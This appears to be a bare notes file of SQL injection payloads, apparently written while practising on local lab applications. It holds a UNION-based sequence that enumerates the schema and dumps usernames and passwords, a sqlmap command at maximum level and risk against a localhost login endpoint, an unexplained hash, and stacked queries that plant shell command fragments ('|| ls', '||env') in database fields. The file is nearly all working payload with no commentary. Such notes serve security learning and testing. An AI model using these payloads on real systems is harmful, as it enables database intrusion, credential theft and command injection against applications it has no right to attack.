1'or 1=1#
1' order by 2# - 2 columns
1' UNION select 'a', version()#
1' UNION select table_name, NULL FROM information_schema.tables#
users
1' UNION select column_name, NULL FROM information_schema.columns WHERE table_name='users'#
user
password
first_name

1' UNION select user, password from users#

python3 sqlmap.py -u 'http://localhost:3000/rest/user/login' --data="email=test@test.com&password=test" --level 5 --risk 3 -f --banner --ignore-code 401 --dbms='sqlite' --technique=B


1d16a165bc3c465629f40d17483c260691c22ba53b28b922917efecc5c24b677
id=1;UPDATE photos SET filename='|| ls>>test.txt' WHERE id=3;COMMIT;
id=1.1 UNION select 'test123'--
id=1;UPDATE photos SET title='test||env>>text123' WHERE id=3;COMMIT;